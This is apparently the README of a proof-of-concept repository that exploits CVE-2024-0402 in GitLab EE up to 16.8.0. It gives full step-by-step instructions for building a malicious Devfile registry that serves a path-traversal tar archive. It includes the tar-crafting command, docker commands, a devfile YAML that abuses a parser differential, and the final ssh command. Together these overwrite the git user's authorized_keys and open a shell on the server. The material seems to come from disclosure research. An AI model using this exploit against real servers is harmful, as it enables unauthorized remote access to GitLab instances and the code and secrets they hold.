The project contains a malicious Devfile Registry usable to exploit CVE-2024-0402 in Gitlab.
A nodejs:2.2.1
stack is indexed to expose the archive.tar
file exploiting the path-traversal issue in registry-support library before v1.1.0.
tar location: malicious-devfile-registry/stacks/nodejs/2.2.1/archive.tar
It was created using the to overwrite the /var/opt/gitlab/.ssh/authorized_keys
in the target Gitlab Server with the SSH keys under ssh-keys/
folder in this repo.
python3 authorized_keys -f authzkeys.tar.gz -p var/opt/gitlab/.ssh/ -o unix
Once running, the registry will have the malicious .tar added to the fetchable stacks.
See the index.json
listing it among the stack resources:
"links": {
"self": "devfile-catalog/nodejs:2.2.1"
"resources": [
Configure a Gitlab Instance EE with version <=16.8.0. Enable Workspaces on it following the docs and the extra notes in our dedicated !exploitable series blogpost.
Whenever ready, follow the steps below:
docker build -t devfile-index .
in the root of this repo to build the registry container image -
docker run -d -p 5000:5000 --name local-registrypoc registry:2
to run a local container registry that will be used by the Devfile registry to store the stack. Note: you should edit the command to expose it according to your need. For us, it was all happening in a local environment -
docker run --network host devfile-index
to start the malicious Devfile registry built at step one. Note: Like before, edit the run command as you wish to make it reachable by the Gitlab instance -
Authenticate as developer to the target Gitlab server, then edit the
of a repository you control. The YAML must exploit the parser differential to allow fetching from the malicious registry
schemaVersion: 2.2.0
!binary parent:
id: nodejs
registryUrl: http://<YOUR_MALICIOUS_REGISTRY>:<PORT>
- name: development-environment
gl/inject-editor: true
image: ""
To trigger the file-write in the Gitlab UI, just start a new Workspace in the edited repo. After few seconds, the arbitrary file write should happen and the
will be added to theauthorized_keys
of thegit
user -
You should be able to enjoy an unrestricted shell as
ssh -i ssh-keys/pockey git@<YOUR_GITLAB_SERVER>